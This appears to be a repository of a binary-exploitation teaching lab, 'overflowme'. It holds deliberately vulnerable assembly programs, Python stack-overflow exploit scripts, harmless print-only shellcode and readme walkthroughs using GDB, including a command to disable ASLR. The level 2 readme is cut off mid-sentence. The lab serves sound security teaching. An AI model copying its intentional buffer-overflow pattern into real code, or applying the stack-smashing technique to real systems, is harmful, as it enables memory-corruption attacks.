├── LICENSE ├── level_1 ├── Makefile ├── exploit.py ├── overflowme.s ├── overflowme_canary.s └── readme.md ├── level_2 ├── Makefile ├── exploit.py ├── overflowme.s ├── print_shellcode.s ├── print_shellcode_rm_bad_chars.s ├── readme.md ├── shellcode_formatter.py └── test_shell.c └── readme.md /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 digitalandrew 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /level_1/Makefile: -------------------------------------------------------------------------------- 1 | overflowme.o: overflowme.s 2 | as -g -o overflowme.o overflowme.s 3 | 4 | overflowme: overflowme.o 5 | gcc -o overflowme overflowme.o 6 | rm -f overflowme.o 7 | 8 | overflowme_canary.o: overflowme_canary.s 9 | as -g -o overflowme_canary.o overflowme_canary.s 10 | 11 | overflowme_canary: overflowme_canary.o 12 | gcc -o overflowme_canary overflowme_canary.o 13 | rm -f overflowme_canary.o 14 | 15 | all: overflowme.o overflowme overflowme_canary.o overflowme_canary 16 | 17 | clean: 18 | rm -f overflowme.o 19 | rm -f overflowme 20 | rm -f overflowme_canary.o 21 | rm -f overflowme_canary -------------------------------------------------------------------------------- /level_1/exploit.py: -------------------------------------------------------------------------------- 1 | import sys 2 | padding = b"\x41" * (512 + 8) # 512 bytes to fill the stack plus 8 to fill up the callers BP (RBP) 3 | return_address = b"\x41\x41\x41\x41\x41\x41" # this value will be overflowed into the return address allowing control of the instruction pointer (RIP) 4 | sys.stdout.buffer.write(padding + return_address) -------------------------------------------------------------------------------- /level_1/overflowme.s: -------------------------------------------------------------------------------- 1 | .file "overflowme.s" 2 | .intel_syntax noprefix 3 | .text 4 | .section .rodata 5 | intro_message: 6 | .string "My buffer is open for input, please don't overflow me!\n" 7 | .equ intro_length, .-intro_message -1 8 | 9 | outro_message: 10 | .string "Thanks for not overflowing me!\n" 11 | .equ outro_length, .-outro_message -1 12 | 13 | hidden_message: 14 | .string "Hey you're not supposed to be here!\n" 15 | .equ hidden_length, .-hidden_message -1 16 | 17 | 18 | .text 19 | .globl hidden_print 20 | .type hidden_print, @function 21 | hidden_print: 22 | # function prologue 23 | push rbp 24 | mov rbp, rsp 25 | # code to echo out message 26 | mov rax, 0x01 # 0x01 is write syscall 27 | mov rdi, 1 # setting fd to STDOUT (1) 28 | mov rdx, hidden_length # length of string to print 29 | lea rsi, hidden_message[rip] # pointer to start of message to print 30 | syscall 31 | # function epilogue 32 | mov rsp, rbp 33 | pop rbp 34 | ret 35 | 36 | .text 37 | .globl main 38 | .type main, @function 39 | 40 | 41 | .text 42 | .globl echo_print 43 | .type echo_print, @function 44 | echo_print: 45 | # function prologue 46 | push rbp 47 | mov rbp, rsp 48 | sub rsp, 512 # allocate space on stack for buffer to hold input string (this is the equivalent in C of a local variable declared as char buffer[512]) 49 | # code to read user input and store onto stack 50 | mov rax, 0 # setting rax for read syscall 51 | mov rdi, 0 # fd for STDIN (0) 52 | lea rsi, QWORD PTR -512[rbp] # pointer to allocated space on the stack 53 | mov rdx, 1023 # this should match buffer size -1 to prevent overflow 54 | before_read_syscall: # label to set breakpoint before filling buffer with read syscall 55 | syscall 56 | # code to echo out message 57 | mov rdx, rax # length of string input is returned from read syscall into rax, moving it into rdx 58 | mov rax, 0x01 # 0x01 is write syscall 59 | mov rdi, 1 # setting fd to STDOUT (1) 60 | lea rsi, QWORD PTR -512[rbp] # pointer to start of message to print 61 | syscall 62 | # function epilogue 63 | before_function_return: # label to set breakpoint before the function return 64 | mov rsp, rbp 65 | pop rbp 66 | ret 67 | 68 | .text 69 | .globl main 70 | .type main, @function 71 | main: 72 | push rbp 73 | mov rbp, rsp 74 | # code to print intro message 75 | mov rax, 0x01 # 0x01 is write syscall 76 | mov rdi, 1 # setting fd to STDOUT (1) 77 | lea rsi, intro_message[rip] # pointer to start of message to print 78 | mov rdx, intro_length # length of string to print 79 | syscall 80 | before_function_call: # label to set breakpoint before the function call 81 | call echo_print 82 | return_from_function: # label added to easily find return address from function call 83 | # code to print outro message 84 | mov rax, 0x01 # 0x01 is write syscall 85 | mov rdi, 1 # setting fd to STDOUT (1) 86 | lea rsi, outro_message[rip] # pointer to start of message to print 87 | mov rdx, outro_length # length of string to print 88 | syscall 89 | mov eax, 0 # return 0 for no error 90 | # function epilogue 91 | mov rsp, rbp 92 | pop rbp 93 | ret 94 | .size main, .-main 95 | .section .note.GNU-stack,"",@progbits 96 | -------------------------------------------------------------------------------- /level_1/overflowme_canary.s: -------------------------------------------------------------------------------- 1 | .file "overflowme_canary.s" 2 | .intel_syntax noprefix 3 | .text 4 | .section .rodata 5 | intro_message: 6 | .string "My buffer is open for input, please don't overflow me!\n" 7 | .equ intro_length, .-intro_message -1 8 | 9 | outro_message: 10 | .string "Thanks for not overflowing me!\n" 11 | .equ outro_length, .-outro_message -1 12 | 13 | 14 | overflow_message: 15 | .string "\nHey you overflowed me!\n" 16 | .equ overflow_length, .-overflow_message -1 17 | 18 | .text 19 | .globl echo_print 20 | .type echo_print, @function 21 | echo_print: 22 | # start of function prologue 23 | push rbp 24 | mov rbp, rsp 25 | # code to store stack canary onto the stack 26 | mov rcx, fs:40 # stack canary from OS can be read from fs:40 27 | push rcx # push the stack canary onto the stack right before the callers BP and return address 28 | 29 | sub rsp, 512 # allocate space on stack for buffer to hold input string (this is the equivalent in C of a local variable declared as char buffer[512]) 30 | # code to read user input and store onto stack 31 | mov rax, 0 # setting rax for read syscall 32 | mov rdi, 0 # fd for STDIN (0) 33 | lea rsi, QWORD PTR -512[rbp] # pointer to allocated space on the stack 34 | mov rdx, 1023 # this should match buffer size to prevent overflow 35 | syscall 36 | # code to echo out message 37 | mov rdx, rax # length of string input is returned from read syscall into rax, moving it into rdx 38 | mov rax, 0x01 # 0x01 is write syscall 39 | mov rdi, 1 # setting fd to STDOUT (1) 40 | lea rsi, QWORD PTR -512[rbp] # pointer to start of message to print 41 | syscall 42 | # code to verify stack canary has not been tampered with 43 | mov rcx, fs:40 # re-read the stack canary from the OS 44 | xor rcx, QWORD PTR -8[rbp] # check stack canary from the OS with the stack canary that was placed onto the stack, if they are equal then XOR will return 0 45 | test rcx, rcx # check if zero which means stack canary has not been modified 46 | jnz overflow_detected # if not zero, this means the stack is corrupted and we should not return from the call 47 | mov rsp, rbp 48 | pop rbp 49 | ret 50 | overflow_detected: 51 | # Start of function code to print overflow detected message, this is similar to the "*** Stack Smashing Detected *** : terminated" message and functionality in the default stack canaries implemented by GCC 52 | mov rax, 0x01 # 0x01 is write syscall 53 | mov rdi, 1 # setting fd to STDOUT (1) 54 | lea rsi, overflow_message[rip] # pointer to start of message to print 55 | mov rdx, overflow_length # length fo string to print 56 | syscall 57 | # Syscall to exit 58 | mov rax, 60 # syscall sub function to exit 59 | mov rdi, 1 # return 1 for standard error 60 | syscall 61 | 62 | .text 63 | .globl main 64 | .type main, @function 65 | main: 66 | push rbp 67 | mov rbp, rsp 68 | # Start of code to print intro message 69 | mov rax, 0x01 # 0x01 is write syscall 70 | mov rdi, 1 # setting fd to STDOUT (1) 71 | lea rsi, intro_message[rip] # pointer to start of message to print 72 | mov rdx, intro_length # length fo string to print 73 | syscall 74 | call echo_print 75 | # Start of code to print outro message 76 | mov rax, 0x01 # 0x01 is write syscall 77 | mov rdi, 1 # setting fd to STDOUT (1) 78 | lea rsi, outro_message[rip] # pointer to start of message to print 79 | mov rdx, outro_length # length fo string to print 80 | syscall 81 | mov eax, 0 82 | mov rsp, rbp 83 | pop rbp 84 | ret 85 | .size main, .-main 86 | .section .note.GNU-stack,"",@progbits 87 | -------------------------------------------------------------------------------- /level_1/readme.md: -------------------------------------------------------------------------------- 1 | # Overflowme Level 1 - The Basics 2 | 3 | Your challenge should you accept it is to get the overflowme binary to print out the hidden message "Hey you're not supposed to be here!" without modifying the source code. If you want to follow along with the walkthrough the rest of the readme will guide you through step by step instructions. 4 | 5 | ## Step 1 - Assemble and Link the Binary 6 | 7 | This level makes use of assembly source code to help teach about the basics of binary exploitation and the call stack. The assembly code has been tweaked from compiled C code to make it a bit more readable but closely mimics a stack overflow that could be present in poorly written C code. 8 | 9 | To assemble and link a Makefile has been provided. 10 | 11 | ```bash 12 | make overflowme 13 | ``` 14 | 15 | You can give the binary a spin now. 16 | 17 | ```bash 18 | ./overflowme 19 | ``` 20 | 21 | The binary performs an echo print that will echo back whatever you input to it (so long as you don't overflow it...). 22 | 23 | ## Step 2 - Source Code Review 24 | 25 | The binary is tempting us to overflow it, let's review the source code and see how we can. 26 | 27 | Starting from the `main:` label which denotes the main function and where the program will start a few lines in the `echo_print` function is called which is where the user input is taken and printed back out. Let's investigate this function further. 28 | 29 | The first two lines perform what is called the function prologue, this is done to preserve the caller's base pointer and set the callees (inside the function) base pointer to the current stack pointer. This places the call stack on top of the current stack so that it can be preserved for when the function returns. Next, the stack pointer is moved down 512 by subtracting 512 from it, recall that the stack grows downwards. This is done to allocate space on the stack to hold temporary variables. This would be the equivalent in C of allocating a local array using `char buffer[512];`. 30 | 31 | The next 4 lines set up to perform a read syscall, note that each of the lines of assembly is carefully commented so you can review and see what they do. If you want to see more details about syscalls, this [document](https://www.chromium.org/chromium-os/developer-library/reference/linux-constants/syscalls/) provides excellent details. Of importance in our investigation is the line which sets RDX to 1023. This is what sets the maximum amount of characters that can be read in by syscall to prevent overflowing the buffer set to hold it. Above this line we also see that a pointer is moved into RSI to point to the start of the buffer allocated on the stack (512 down from the base pointer). This is where the input from the read syscall will be stored. You've probably already noticed the mistake, we allocated a buffer of 512 bytes but will allow 1023 to be read in. 32 | 33 | ## Step 3 - Overflowing Overflowme 34 | 35 | We're now ready to overflow the buffer and see what happens, to do so we'll need an input of greater than 512 chars. Instead of manually doing this we'll use a Python script. I've included one to work off that in its current state will print out 528 "A"s. We can pipe the output of it into the overflowme binary. 36 | 37 | ```bash 38 | python3 exploit.py | ./overflowme 39 | ``` 40 | 41 | You should see that the program echoed back the A's however afterwards it crashed with a segmentation fault. Segmentation faults usually occur when the program attempts to access an invalid memory address or memory that it doesn't have permission to access. 42 | 43 | ## Step 4 - Investigating with GDB 44 | 45 | To understand why this is happening we'll investigate further with GDB, before we do so it will make things a bit easier in GDB to store the output of the Python script into a file we can pass in. 46 | 47 | ```bash 48 | python3 exploit.py > AAAA 49 | ``` 50 | 51 | Now we can launch up GDB to step through the binary 52 | 53 | ```bash 54 | gdb ./overflowme 55 | ``` 56 | 57 | First, let's set up some breakpoints to catch the code at specific key points so we can investigate. To do so in gdb you can use "b" followed by either a line number or label. Set the following: 58 | 59 | `b before_function_call` 60 | 61 | `b before_read_syscall` 62 | 63 | `b before_function_return` 64 | 65 | Now let's run the program but direct the file we created into stdin. 66 | 67 | `r < AAA` 68 | 69 | GDB will automatically halt execution at the first breakpoint before we call the `echo_print` function. At this point let's investigate a few key pieces of information. First, let's check what the current base pointer is, this can be displayed with: 70 | 71 | `i r rbp` 72 | 73 | For me the base pointer is currently 0x7fffffffdd60 however it may be different for you. 74 | 75 | Next, let's check the return address from the function using the label `return_from_function`: 76 | 77 | `info address return_from_function` 78 | 79 | On my system, the return address is at 0x5555555551bf (again it might be different for you). 80 | 81 | For now, let's keep note of both of these addresses and continue execution of the program by pressing `c`. 82 | 83 | GDB has again halted execution, this time right before the read syscall which will fill our buffer up with A's. In the function prologue, we saved the caller's base pointer to the stack directly above the current base pointer. We can verify this by reading the 8 bytes above the current base pointer with: 84 | 85 | `x/xg $rbp` 86 | 87 | The second value displayed in white is the contents and the value in blue is the address being read from. Notice how the contents match the base pointer we saw before the function call. 88 | 89 | After the function is done executing it needs to know where to return in the program, this is done by retrieving the return address from the stack. When a function is called the the return address is pushed onto the stack directly before program control is switched to the function code. We can see this return address by looking at the memory starting 8 bytes above the current basepoint with: 90 | 91 | `x/xg $rbp+8` 92 | 93 | Note how at this point this matches the address we saw for the return label. This implementation of the call stack is what makes stack overflows potentially so dangerous because if we can overwrite the stack to where the return address is then we can control the flow of the program. A visual representation of the stack at this point is provided below. 94 | 95 |  96 | 97 | Let's continue with the program execution with `c` again. 98 | 99 | The function works as expected printing out the A's we input and at this point has not crashed. GDB has again halted execution after the syscall before the function performs the epilogue and returns. We can investigate the caller's base pointer and the return address again resuing the above commands. As you can see they are both filled with 41 (which is the hex ascii representation of A). The same stack diagram is shown below with the current state of the stack. 100 | 101 | Continuing one last time with `c` you'll notice that now we get a segmentation fault. When the function attempts to return the return address has been corrupted and the program is not able to access it to get what would be the next instruction resulting in a segmentation fault. 102 | 103 | Before we exit GDB, let's get one other piece of key information we will need, the address for the `hidden_print` function so we can craft an exploit to jump there. 104 | 105 | To do so rerun the program with `r` and then display the address with: 106 | 107 | `info address hidden_print` 108 | 109 | Mine is located at 0x555555555129, again yours may be different so make sure to take note of this. 110 | 111 | ## Step 5 - Craft the Exploit 112 | 113 | Now that we understand how the call stack works and what happens when we overflow the stack past the caller's base pointer and into the return address we can craft an exploit to take control of program flow and jump to the hidden print. 114 | 115 | Let's start by updating the exploit script with the return address instead of just 41s. One important thing to keep in mind is that the bytes will be pushed onto the stack in reverse order from how they are read so we need to fill them in our exploit backwards. For example,e my address of 0x555555555129 would translate into "\x29\x51\x55\x55\x55\x55". 116 | 117 | Let's create another file with our updated exploit. 118 | 119 | ```bash 120 | python3 exploit.py > jmp2hidden 121 | ``` 122 | 123 | ## Step 6 - Launch the Exploit 124 | 125 | Now let's re-run the binary with GDB using the same steps to set the same breakpoints except this time point the jmp2hidden file to stdin `r < jmp2hidden`. 126 | 127 | If you'd like you can investigate the return address and base pointer at each progression, however, the one we are most concerned with is the one right before the return from the function call. Use `c` to continue until that breakpoint and then review the return address with: 128 | 129 | `x/xg $rbp+8` 130 | 131 | If everything worked with the exploit you should see the address for `hidden_print` listed, an example of the stack with my return address is shown below. 132 | 133 |  134 | 135 | Continue execution again with `c` and you should now see the hidden message printed out followed by another segmentation fault. 136 | 137 | Congrats your exploit worked! If you're curious about why the program ends with a segmentation fault still, this is because we didn't properly call the `hidden_print` function, instead we hijacked the instruction pointer and moved directly there. Because of this, we didn't push a return address to the stack so when the function attempts to return it gets a garbage return address which causes a segmentation fault. In future levels, we'll look at how we can prevent this if we want to keep the exploit from crashing our program. 138 | 139 | ## Step 7 - Remediation and Protections 140 | 141 | In this step, we'll take a look at some remediation and protections that we can put in place to prevent stack overflows and other memory corruption attacks. These will be important because in later levels where we'll also look at how we can potentially bypass these. 142 | 143 | Of course, the easiest remediation step is to make sure the amount of characters we'll receive from the read syscall matches the buffer. In a higher-level language like C, this could also mean using memory safe versions of functions. For example snprintf() instead of sprintf(). 144 | 145 | Outside of ensuring the code doesn't contain overflow vulnerabilities, modern operating systems have multiple protections built in to prevent memory corruption attacks like a stack overflow. We'll explore two of them at this level. The first one is ASLR which stands for Address Space Layout Randomization. This protection randomizes the address space of binaries/executables when they are run. This makes exploitation much more difficult because we won't know the addresses of things like the stack and other functions. To see this in progress try to run the updated exploit with the return address against the overflowme binary outside of GDB. 146 | 147 | ```bash 148 | python3 exploit.py | ./overflowme 149 | ``` 150 | 151 | If you're running on a modern Linux distro then you will get the same result as you did with the exploit that has just A's, a seg fault after the echo without printing out the hidden message. This is because when the binary is run in GDB it disables ASLR as it makes debugging easier with it off, however, when the binary is run outside of GDB ASLR is enabled and now the address of the `hidden_print` function is different preventing us from knowing what address is needed to jump to it. You can temporarily turn off ASLR with the following command: 152 | 153 | ```bash 154 | sudo sysctl -w kernel.randomize_va_space=0 155 | ``` 156 | 157 | Now if you re-run the exploit it should work and jump you to the hidden print. If you want to turn ASLR back on you can set it back with the following: 158 | 159 | ```bash 160 | sudo sysctl -w kernel.randomize_va_space=2 161 | ``` 162 | 163 | We'll learn more about some methods to chain vulnerabilities together to bypass ASLR in future levels. 164 | 165 | The next protection we'll look at is stack canaries. These are a randomized value retrieved from the operating system that is placed onto the stack directly below the caller's base pointer after the function prologue. Before returning from a function the stack canary that was placed onto the stack is checked against the one that the operating system provided, if they don't match this means that something has corrupted the memory and potentially overwritten the return address. Instead of returning from the function the process will display an error message and exit. 166 | 167 | To see an implementation of stack canaries in practice let's build a modified version of overflowme. 168 | 169 | ```bash 170 | make overflowme_canary 171 | ``` 172 | 173 | If you run the binary normally without overflowing the buffer you'll notice it functions as you would expect. If you run it again and pass in the exploit as input you'll notice a different message displayed "Hey you overflowed me". Let's take a look at the source code for overflowme_canary and see how this works. 174 | 175 | Inside of the `echo_print` on the third line in the function, the stack canary is received from a special address where the OS places the stack canary. It is then pushed onto the stack. 176 | 177 |  178 | 179 | The function then continues as normal until directly before the return where the stack canary is retrieved from the stack again and checked against the one on the stack. If they are equal the function proceeds and returns as normal. If they don't match instead the stack overflow message is printed and the process exits. 180 | 181 | When working in higher-level languages like C stack canaries are added by default by the compiler. In this example, I've hand-written one in assembly so that it's easier to see how they work, however, the implementation from GCC or other compilers is very similar. 182 | 183 | Similar to ASLR there are ways that stack canaries can be bypassed by chaining together vulnerabilities. We'll learn more about this in future levels as well. 184 | 185 | ## Nice Job! 186 | 187 | That wraps up the first level of overflowme, in the next level we'll take a look at upgrading our exploit from just jumping to another place in the program to jumping to the shellcode we load into the stack. 188 | 189 | 190 | -------------------------------------------------------------------------------- /level_2/Makefile: -------------------------------------------------------------------------------- 1 | overflowme.o: overflowme.s 2 | as -g -o overflowme.o overflowme.s 3 | 4 | overflowme: overflowme.o 5 | gcc -z execstack -o overflowme overflowme.o 6 | rm -f overflowme.o 7 | 8 | print_shellcode.o: print_shellcode.s 9 | as -g -o print_shellcode.o print_shellcode.s 10 | 11 | print_shellcode: print_shellcode.o 12 | ld -e start -o print_shellcode print_shellcode.o 13 | rm -f print_shellcode.o 14 | 15 | print_shellcode_rm_bad_chars.o: print_shellcode_rm_bad_chars.s 16 | as -g -o print_shellcode_rm_bad_chars.o print_shellcode_rm_bad_chars.s 17 | 18 | print_shellcode_rm_bad_chars: print_shellcode_rm_bad_chars.o 19 | ld -e start -o print_shellcode_rm_bad_chars print_shellcode_rm_bad_chars.o 20 | rm -f print_shellcode_rm_bad_chars.o 21 | 22 | all: overflowme.o overflowme print_shellcode.o print_shellcode print_shellcode_rm_bad_chars.o print_shellcode_rm_bad_chars 23 | 24 | clean: 25 | rm -f overflowme.o 26 | rm -f overflowme 27 | rm -f print_shellcode 28 | rm -f print_shellcode_rm_bad_chars -------------------------------------------------------------------------------- /level_2/exploit.py: -------------------------------------------------------------------------------- 1 | # update return address you need (somewhere in the stack where the nops are) 2 | # Return address we want = 0x7fffffffda20 3 | # 512 (size of stack) + 8 (callers bp) = 520 4 | 5 | import sys 6 | stack_plus_bp=520 7 | shellcode = b"\x48\xb9\x54\x43\x4d\x52\x55\x4c\x45\x5a\x51\x48\x31\xc0\xb0\x01\x48\x89\xc7\x48\x89\xe6\x48\x31\xd2\xb2\x08\x0f\x05" 8 | padding = b"\x41" * 128 9 | nops = b"\x90" * (stack_plus_bp - len(shellcode) - len(padding)) 10 | return_address = b"\x20\xda\xff\xff\xff\x7f" 11 | sys.stdout.buffer.write(nops + shellcode + padding + return_address) -------------------------------------------------------------------------------- /level_2/overflowme.s: -------------------------------------------------------------------------------- 1 | .file "overflowme.s" 2 | .intel_syntax noprefix 3 | .text 4 | .section .rodata 5 | intro_message: 6 | .string "My buffer is open for input, please don't overflow me!\n" 7 | .equ intro_length, .-intro_message -1 8 | 9 | outro_message: 10 | .string "Thanks for not overflowing me!\n" 11 | .equ outro_length, .-outro_message -1 12 | 13 | hidden_message: 14 | .string "Hey you're not supposed to be here!\n" 15 | .equ hidden_length, .-hidden_message -1 16 | 17 | 18 | .text 19 | .globl hidden_print 20 | .type hidden_print, @function 21 | hidden_print: 22 | # function prologue 23 | push rbp 24 | mov rbp, rsp 25 | # code to echo out message 26 | mov rax, 0x01 # 0x01 is write syscall 27 | mov rdi, 1 # setting fd to STDOUT (1) 28 | mov rdx, hidden_length # length of string input is returned from read syscall into rax, moving it into rdx 29 | lea rsi, hidden_message[rip] # pointer to start of message to print 30 | syscall 31 | # function epilogue 32 | mov rsp, rbp 33 | pop rbp 34 | ret 35 | 36 | .text 37 | .globl main 38 | .type main, @function 39 | 40 | 41 | .text 42 | .globl echo_print 43 | .type echo_print, @function 44 | echo_print: 45 | # function prologue 46 | push rbp 47 | mov rbp, rsp 48 | sub rsp, 512 # allocate space on stack for buffer to hold input string (this is the equivalent in C of a local variable declared as char buffer[512]) 49 | # code to read user input and store onto stack 50 | mov rax, 0 # setting rax for read syscall 51 | mov rdi, 0 # fd for STDIN (0) 52 | lea rsi, QWORD PTR -512[rbp] # pointer to allocated space on the stack 53 | mov rdx, 1023 # this should match buffer size -1 to prevent overflow 54 | before_read_syscall: # label to set breakpoint before filling buffer with read syscall 55 | syscall 56 | # code to echo out message 57 | mov rdx, rax # length of string input is returned from read syscall into rax, moving it into rdx 58 | mov rax, 0x01 # 0x01 is write syscall 59 | mov rdi, 1 # setting fd to STDOUT (1) 60 | lea rsi, QWORD PTR -512[rbp] # pointer to start of message to print 61 | syscall 62 | # function epilogue 63 | before_function_return: # label to set breakpoint before the function return 64 | mov rsp, rbp 65 | pop rbp 66 | ret 67 | 68 | .text 69 | .globl main 70 | .type main, @function 71 | main: 72 | push rbp 73 | mov rbp, rsp 74 | # code to print intro message 75 | mov rax, 0x01 # 0x01 is write syscall 76 | mov rdi, 1 # setting fd to STDOUT (1) 77 | lea rsi, intro_message[rip] # pointer to start of message to print 78 | mov rdx, intro_length # length fo string to print 79 | syscall 80 | before_function_call: # label to set breakpoint before the function call 81 | call echo_print 82 | return_from_function: # label added to easily find return address from function call 83 | # code to print outro message 84 | mov rax, 0x01 # 0x01 is write syscall 85 | mov rdi, 1 # setting fd to STDOUT (1) 86 | lea rsi, outro_message[rip] # pointer to start of message to print 87 | mov rdx, outro_length # length fo string to print 88 | syscall 89 | mov eax, 0 # return 0 for no error 90 | # function epilogue 91 | mov rsp, rbp 92 | pop rbp 93 | ret 94 | .size main, .-main 95 | .section .note.GNU-stack,"",@progbits 96 | -------------------------------------------------------------------------------- /level_2/print_shellcode.s: -------------------------------------------------------------------------------- 1 | .intel_syntax noprefix 2 | .text 3 | .globl start 4 | 5 | # Program to print out hello 6 | start: 7 | mov rcx, 0x5A454C55524D4354 # setting up to push string onto the stack in reverse order 8 | push rcx 9 | mov rax, 1 # setting rax to 1 for write syscall 10 | mov rdi, 1 # setting rdi to fd of stdout 11 | mov rsi, rsp # stack pointer pointing to string to print 12 | xor rdx, rdx # zeroing out rdx 13 | mov rdx, 8 # length of string to print 14 | syscall 15 | -------------------------------------------------------------------------------- /level_2/print_shellcode_rm_bad_chars.s: -------------------------------------------------------------------------------- 1 | .intel_syntax noprefix 2 | .text 3 | .globl start 4 | 5 | # Program to print out hello 6 | start: 7 | mov rcx, 0x5A454C55524D4354 # setting up to push string onto the stack in reverse order 8 | push rcx 9 | xor rax, rax # zeroing out rax 10 | mov al, 1 # setting rax to 1 for write syscall 11 | mov rdi, rax # setting rdi to fd of stdout 12 | mov rsi, rsp # stack pointer pointing to string to print 13 | xor rdx, rdx # zeroing out rdx 14 | mov dl, 8 # length of string to print 15 | syscall 16 | -------------------------------------------------------------------------------- /level_2/readme.md: -------------------------------------------------------------------------------- 1 | # Overflowme Level 2 - Shellcodin' and Exploitin' 2 | 3 | Your challenge should you accept it is to get the overflowme binary to print out message "TCMRULEZ" without modifying the source code. If you want to follow along with the walkthrough the rest of the readme will guide you through step by step instructions. 4 | 5 | ## Step 1 - Assemble and Link the Binary 6 | 7 | This level makes use of assembly source code to help teach about the basics of binary exploitation and the call stack. The assembly code has been tweaked from compiled C code to make it a bit more readable but closely mimics a stack overflow that could be present in poorly written C code. 8 | 9 | To assemble and link a Makefile has been provided. 10 | 11 | ```bash 12 | make overflowme 13 | ``` 14 | 15 | You can give the binary a spin now. 16 | 17 | ```bash 18 | ./overflowme 19 | ``` 20 | 21 | The binary performs an echo print that will echo back whatever you input to it (so long as you don't overflow it...). 22 | 23 | ## Step 2 - Stack Smashing Fundamentals 24 | 25 | From the previous level we found that the binary was vulnerable to a stack overflow. By crafting a specifically crafted input (which we turned into an exploit) we were able to get the binary to jump to a section of code we shouldn't have access to and execute it to print the hidden message. In this challenge we need to print out a new message that's not included anywhere in the binary, to do this we'll need to exploit the stack overflow to run code that we generate instead of jumping to pre-existing code in the binary. To do this we'll perform a stack smashing attack, one of the oldest forms of stack overflow exploits. In this exploit, instead of filling up the stack with A's or random characters, we'll craft an input that fills the stack with code that we've written and then overwrite the return address so it points to the start of the code in the stack. 26 | 27 | ## Step 3 - Writing Shellcode 28 | 29 | When the overflowme binary is run, its content is loaded into memory as actual binary (hence why it's called a binary). The executable sections of the binary which are the "code" are in machine code format which is the 1s and 0s (or hexadecimal) representation of assembly. In order to inject code into the memory through the stack overflow vulnerability we found, we'll need it to be in raw machine code, which when working on exploits is commonly refferred to as the shellcode. In our case we won't be using it to spawn a shell, however that's the most common use of shellcode, which is how it got the name. 30 | 31 | There are multiple processes or steps to generate shellcode, one of the most common is to use a tool like msfvenom to generate it for you, however, it's best to learn how to write it yourself because you'll frequently be up against constraints that require custom shellcode and auto generated shellcode will most likely get picked up by AV and other detections. 32 | 33 | In this walkthrough I'm going to outline the method that I use. 34 | 35 | The first step is to start with assembly code and write a bare minimum program that will accomplish the task we want. Usually shellcode will simply set up for a system call and then make that system call to perform the task we want. In our case it's to print out a message. I like to refer to this [https://www.chromium.org/chromium-os/developer-library/reference/linux-constants/syscalls/](Table) hosted by the chromium project. Consulting the table we see that syscall number 1 is the write syscall and also a handy reference of what registers need to be set. Arg0(rdi) is set to the file descriptor, which in our case will be stdout, Arg1(rsi) is a pointer to the first char in the string to print, Arg2(rdx) is the number of chars we want to print. 36 | 37 | Here are the steps we'll need to take to write this basic program: 38 | 39 | 1. Push the string we want to print onto the stack in reverse order (we need everything to be self contained so we can't use a data section in our assembly) 40 | 2. Set RAX to the syscall number, which for write is 1 41 | 3. Set RDI to the file descriptor number for stdout which is also 1 42 | 4. Set RSI to point to the start of the string, which for us conveniently starting at the stack pointer 43 | 5. Set RDX to the length of the string to print (which is 8) 44 | 45 | If you want to see my code for this, check out print_shellcode.s 46 | 47 | After writing the assembly, the next step is to assemble, link it and then run the resulting binary to make sure it works. 48 | 49 | I've included a makefile to make the process easier. 50 | 51 | ```bash 52 | make print_shellcode 53 | ``` 54 | We can now run it and make sure that it does what we want it to do (print out our string). 55 | 56 | ```bash 57 | ./print_shellcode 58 | ``` 59 | 60 | If yours worked properly you should see it print out TCMRULEZ and then crash with a seg fault. This is because we don't have a proper epilogue or exit to the program, but don't worry that's okay because we just want to stript the raw shellcode out of this. 61 | 62 | ## Step 4 - Extracting the Shellcode 63 | 64 | Inside of our binary is the shellcode that we want to extract, there are a few ways to do this. First let's take a look at the contents of our binary with objdump, we can do this with: 65 | 66 | ```bash 67 | objdump -M intel -d print_shellcode 68 | ``` 69 | In the middle column we see the raw machine code for the binary, and the right column shows the assembly. Each line represents one instruction, and the actual raw machine code for each line is the opcode. So at this point we could manually pull out the machine code, however there is a better way to automate this. 70 | 71 | To start we'll used xxd to print out the raw hex with: 72 | 73 | ```bash 74 | xxd -p print_shellcode 75 | ``` 76 | 77 | Now we have the raw hexcode for he entire binary, however we only need the hex for the machine code. If you take note of the objdump output I find it easiest to take note of the first few hex characters and the last few and then locate the machine code that way from the xxd output. I suggest using grep for this. 78 | 79 | ```bash 80 | xxd -p print_shellcode | grep -A2 48b954 81 | ``` 82 | Now you can easily copy all of the machine code starting from the first character all the way to the last. If you're ending on a syscall in x64 llinux then the opcode for that is 0f05 so that will always be the last two hex characters. 83 | 84 | Your raw hexcode should be: "48b954434d52554c455a5148c7c0 85 | 0100000048c7c7010000004889e64831d248c7c2080000000f05" 86 | 87 | 88 | ## Step 5 - Testing the Shellcode 89 | 90 | The next step I like to do is test the shellcode and make sure that it will work before going to the trouble of crafting an exploit. I've included a simple C program that mimic closely what happens in a stack overflow so that we can attempt to execute raw shellcode and make sure it works properly. 91 | 92 | In order to use the shellcode we'll need it in what's called hexadecimal escape sequence which is where each hex character is escaped with \x. 93 | 94 | You can manually do this, however I don't have time for that so I've inlcuded a basic python script that can do it as well. 95 | 96 | ```bash 97 | python3 shellcode_formatter.py 48b954434d52554c455a5148c7c00100000048c7c7010000004889e64831d248c7c2080000000f05 98 | ``` 99 | This will spit you out the format we need, now we can copy this over to the test_shell.c code and paste it in. 100 | 101 | Now we can compile this test and run it, the compilation command is included as a comment in the file. 102 | 103 | ```bash 104 | gcc -o test_shell test_shell.c 105 | ``` 106 | Now run it with: 107 | 108 | ```bash 109 | ./test_shell.c 110 | ``` 111 | We see the output is the same as when we ran the binary, which means our shellcode is working, however 